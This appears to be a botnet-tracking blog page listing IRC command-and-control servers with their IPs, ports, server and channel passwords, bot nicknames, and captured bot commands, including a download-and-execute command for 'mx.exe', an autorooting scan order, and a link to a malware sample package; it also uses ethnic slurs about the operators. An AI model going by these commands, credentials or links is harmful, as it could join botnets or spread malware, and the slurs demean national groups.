213.155.29.120 Port: (6667) pass: (SelamS234) There are 0 users and 2496 invisible on 1 servers unknown connection(s) channels formed I have 2496 clients and 0 servers Current Local Users: 2496 Max: 5613 Current Global Users: 2496 Max: 2832 infos about hosting: http://whois.domaintools.com/213.155.29.120
x.equaldnshost.com(botnet hosted in United States San Francisco Comcast Business Communications Llc)
x.equaldnshost.com DNS_TYPE_A 85.159.70.238 112.148.210.36 112.171.41.101 173.164.198.129 85.159.70.238:9090 Nick: :{00-AUT-XP-pc6-6420} Username: MEAT Server Pass: prison Joined Channel: ###meat Joined Channel: ##hxxp## Channel Topic for Channel ###meat: “.p ###meat “ Channel Topic for Channel ##hxxp##: “.http http://115.93.29.155/mx.exe |.j ###meat “ Set by pe[ro on Mon Mar 14 13:58:51 Private Message to User {iNF-00-AUT-XP-p`xf6’yxf6’x82xf6’xa0xf8’=~@: “HTTP SET http://115.93.29.155/mx.exe” ProcessRead more...
capigroupe9.net(botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 204.0.5.41 80 216.178.38.224 80 216.178.39.11 80 69.171.224.14 80 216.246.98.164 1866 PASS xxx NICK NEW-[USA|00|P|57896] USER XP-0495 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|57896] -ix JOIN #!high! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/216.246.98.164
VistaSystem.yi.org(CCTEAM from israel botnet hosted in United States Eugene Eugene Freezing & Storage)
VistaSystem.yi.org:6667 Established.yi.org:6667 set %chan #Botland set %cpass fuckyouall nick=G|XP|M4Bs4 anick=dfgfdg host=Established.yi.orgSERVER:Established.yi.org:6667 set %chan #Establish set %cpass fuckyouall Resolved : [Established.yi.org] To [216.210.179.67] infos about hosting: http://whois.domaintools.com/216.210.179.67 open ports: listen *:6666; listen *:6667; listen *:6668; listen *:6669; listen *:7000; listen *:6000 this is main server of israeli heckers: link hideout.hub.ircnet.co.il { username *; hostname 210.75.6.2; bind-ipRead more...
tetova.myftp.org(botnet hosted in Brazil Sao Paulo Comite Gestor Da Internet No Brasil)
macedonian lamers using brasilian machine to scan for vnc tetova.myftp.org DNS_TYPE_A 189.74.131.100 189.74.131.100:6667 Nick: raGe|BdJeaNHNrv Username: igsasjs Joined Channel: #asc# with Password rage Channel Topic for Channel #asc#: “.xpl 75 1 24.x.x.x 3 1 24.x.x.x” Private Message to Channel #asc#: “^C14,1.:[^C15,1rAGEBoT^C14,1]:.^C15,1 range: 24.x.x.x with 75 threads. (autorooting)” infos about hosting: http://whois.domaintools.com/189.74.131.100
srv5500.com(snk ruski hecker did it again,Botnet hosted in Germany Ghostnet Gmbh)
host5500.net 94.249.188.107:5500 srv5500.com 94.249.188.107:5500 Now talking in #xux Topic On: [ #xux ] [ , ] Topic By: [ x ] (x) .dl ALL /125/115/124/115/38/48/62/125/82/118/43/106/122/73/115/107/111/67/127/116/113/96/105/108/84/57/113/96/55/120/122/105/77/118/50/64/98/111/ infos about hosting: http://whois.domaintools.com/94.249.188.107
hassan121.no-ip.biz(hasan from pakistan big hecker)
The paki hecker is trying to own the world with his rat DNS Lookup Host Name IP Address hassan121.no-ip.biz 119.158.136.245 Outgoing connection to remote server: hassan121.no-ip.biz TCP port 1111 infos about hosting: http://whois.domaintools.com/119.158.136.245
35mb malware samples
here another package with diferent malwares size around 35mb have fun exploring Download: http://cea13a1c.tubeviral.com
117.211.84.155(botnet hosted in India New Delhi Nib (national Internet Backbone))
Remote Host Port Number 117.211.84.155 23232 USER SmallBot 127.0.0.1 localhost :Small IRC Bot NICK [USA|XP|P1kAlMiG] infos about hosting: http://whois.domaintools.com/117.211.84.155
206.41.117.184(botnet hosted in United States Belleville Monstercommerce Llc)
Remote Host Port Number 206.188.205.86 3232 PASS root NICK {N}|USA|XP|COMPUTERNAME|395144 USER noekag “” “aets” :lvplxr JOIN #MLW2S 0WS1 infos about hosting: http://whois.domaintools.com/206.188.205.86